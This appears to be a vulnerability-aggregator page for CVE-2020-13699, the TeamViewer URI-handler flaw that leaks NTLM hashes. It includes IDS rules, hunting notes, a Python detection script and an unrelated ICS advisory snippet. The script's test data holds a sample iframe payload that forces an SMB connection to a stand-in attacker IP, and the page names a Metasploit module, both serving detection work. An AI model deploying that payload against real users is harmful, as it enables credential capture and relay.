CVE-2020-13699
Published 2020-07-29
CVE-2020-13699: TeamViewer Desktop for Windows before 15.8.3 does not properly quote its custom URI handlers. A malicious website could launch TeamViewer with arbitrary…
Priority P272 · high · 8.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 25.90% (97.7th percentile)
TeamViewer Desktop for Windows before 15.8.3 does not properly quote its custom URI handlers. A malicious website could launch TeamViewer with arbitrary parameters, as demonstrated by a teamviewer10: --play URL. An attacker could force a victim to send an NTLM authentication request and either relay the request or capture the hash for offline password cracking. This affects teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1. The issue is fixed in 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| teamviewer | teamviewer | < 15.8.3 | 15.8.3 |
Detection & IOCs (extracted from sources)
filename.tvs
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT TeamViewer .tvs iFrame Observed (CVE-2020-13699)"; flow:established,to_client; http.response_body; content:"<iframe|20|"; content:"|20|src="; distance:0; pcre:"/^[\x22\x27]t(?:eamviewer(\d+|api)|v(c(hat|ontrol)|filetransfer|joinv|present|s(endfile|q(customer|support))|v(ideocall|pn))\d)/R"; content:"|3a 20|--play"; distance:0; fast_pattern; content:".tvs"; distance:0; reference:url,www.bleepingcomputer.com/news/security/teamviewer-fixes-bug-that-lets-attackers-access-your-pc/; classtype:attempted-admin; sid:2030668; rev:2; metadata:attack_target Client_Endpoint, created_at 2020_08_10, cve CVE_2020_13699, deployment Perimeter, confidence High, signature_severity Major, tag Teamviewer, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_07;)
- Only Firefox can be exploited by this vulnerability, as all other browsers encode the space after 'play' and before the SMB location, preventing successful exploitation. Focus detection and hunting on Firefox user-agent sessions invoking TeamViewer URI handlers.
- Detect HTTP responses containing an iframe with a TeamViewer custom URI scheme (teamviewer10, teamviewerapi, tvchat1, tvcontrol1, etc.) followed by '--play' and a '.tvs' file reference, the canonical exploit delivery pattern.
- The attack forces an outbound SMB connection from the victim to an attacker-controlled IP to capture or relay NTLM authentication hashes. Monitor for unexpected outbound SMB (port 445/139) connections triggered from browser processes.
- The Metasploit module 'auxiliary/server/teamviewer_uri_smb_redirect' implements this attack; presence of this module's traffic pattern or its use in logs is a strong indicator of active exploitation.
- Exploitation requires the victim to be using Firefox; other browsers URL-encode the space in the URI, breaking the attack chain.
- The Snort/ET rule (sid:2030668) inspects HTTP response bodies for the iframe+URI+--play+.tvs pattern; it will not fire on HTTPS traffic unless TLS inspection is in place.
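The content checks in sid:2030668 and the Firefox caveat above, combined into a triage pass over already-decrypted HTTP response bodies. This is an added example, not part of the ET rule set or any vendor tooling. The function names, verdict labels and sample HTML are assumptions constructed for illustration, and the matcher is slightly broader than the rule in that it ignores case and attribute order.

```python
import re

# Scheme alternation copied from the pcre in the ET rule (sid:2030668).
SCHEME = (r"t(?:eamviewer(?:\d+|api)|v(?:c(?:hat|ontrol)|filetransfer|joinv|present"
          r"|s(?:endfile|q(?:customer|support))|v(?:ideocall|pn))\d)")

# iframe tag -> src attribute -> handler scheme -> ": --play" -> argument ending in .tvs
IFRAME_RE = re.compile(
    r"<iframe\b[^>]*?\ssrc=[\"'](?P<scheme>" + SCHEME +
    r"): --play\s+(?P<arg>[^\"'>]*?\.tvs)", re.IGNORECASE)

# A UNC-style argument names the SMB host to correlate with outbound 445/139 traffic.
UNC_HOST_RE = re.compile(r"^[\\/]{2}(?P<host>[^\\/]+)[\\/]")


def scan_body(body):
    """Return one dict per matching iframe: scheme, .tvs argument, UNC host (or None)."""
    hits = []
    for m in IFRAME_RE.finditer(body):
        unc = UNC_HOST_RE.match(m.group("arg"))
        hits.append({"scheme": m.group("scheme").lower(),
                     "arg": m.group("arg"),
                     "smb_host": unc.group("host") if unc else None})
    return hits


def triage(body, user_agent):
    """Rank a response: Firefox passes the raw space, other browsers encode it."""
    hits = scan_body(body)
    if not hits:
        return "clean", hits
    verdict = "investigate-host" if "Firefox/" in user_agent else "delivery-observed"
    return verdict, hits


# Constructed samples (documentation address, not taken from any real capture).
MALICIOUS = ("<html><body><iframe style='height:1px;width:1px' "
             r'src="tvjoinv8: --play \\203.0.113.7\share\session.tvs"></iframe></body></html>')
BENIGN = ("<p>Join with <a href='teamviewer10://meeting'>TeamViewer</a></p>"
          "<iframe src='/ad.html'></iframe>")
FIREFOX_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "Chrome/84.0.4147.105 Safari/537.36")

if __name__ == "__main__":
    for ua in (FIREFOX_UA, CHROME_UA):
        print(triage(MALICIOUS, ua))
    print(triage(BENIGN, FIREFOX_UA))
```

The extracted `smb_host` is the value to pivot on when reviewing outbound SMB connections from the same client.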
CVSS provenance
nvd · v3.1 · 8.8 HIGH · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvd · v2.0 · 6.8 MEDIUM · AV:N/AC:M/Au:N/C:P/I:P/A:P
CISA ICS
VISAM VBASE Editor
cisa_ics·2021-11-09·CVSS 7.4
[HIGH] VISAM VBASE Editor
ICS Advisory
## VISAM VBASE Editor
Last Revised: November 09, 2021
Alert Code: ICSA-21-308-01
## 1. EXECUTIVE SUMMARY
- CVSS v3 7.4
- ATTENTION: Exploitable remotely/low attack complexity
- Vendor: VISAM
- Equipment: VBASE
- Vulnerabilities: Improper Access Control, Cross-site Scripting, Improper Restriction of XML External Entity Reference, Using Components with Known Vulnerabilities
## 2. RISK EVALUATION
Successful exploitation of these vulnerabilities may allow un-neutralized user-controllable data input, disclosure of local files, access to NTLM (Windows New Technology LAN Manager) hashes
GHSA
GHSA-f43w-mfrf-mv66: TeamViewer Desktop for Windows before 15
ghsa_unreviewed·2022-05-24
CVE-2020-13699 [MEDIUM] CWE-428 GHSA-f43w-mfrf-mv66: TeamViewer Desktop for Windows before 15
Suricata
ET EXPLOIT TeamViewer .tvs iFrame Observed (CVE-2020-13699)
suricata·2020-08-10·CVSS 8.8
CVE-2020-13699 [HIGH] ET EXPLOIT TeamViewer .tvs iFrame Observed (CVE-2020-13699)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT TeamViewer .tvs iFrame Observed (CVE-2020-13699)"; flow:established,to_client; http.response_body; content:"<iframe|20|"; content:"|20|src="; distance:0; pcre:"/^[\x22\x27]t(?:eamviewer(\d+|api)|v(c(hat|ontrol)|filetransfer|joinv|present|s(endfile|q(customer|support))|v(ideocall|pn))\d)/R"; content:"|3a 20|--play"; distance:0; fast_pattern; content:".tvs"; distance:0; reference:url,www.bleepingcomputer.com/news/security/teamviewer-fixes-bug-that-lets-attackers-access-your-pc/; classtype:attempted-admin; sid:2030668; rev:2; metadata:attack_target Client_Endpoint, created_at 2020_08_10, cve CVE_2020_13699, deployment Perimeter, confidence High, signature_severity
Published: 2020-07-29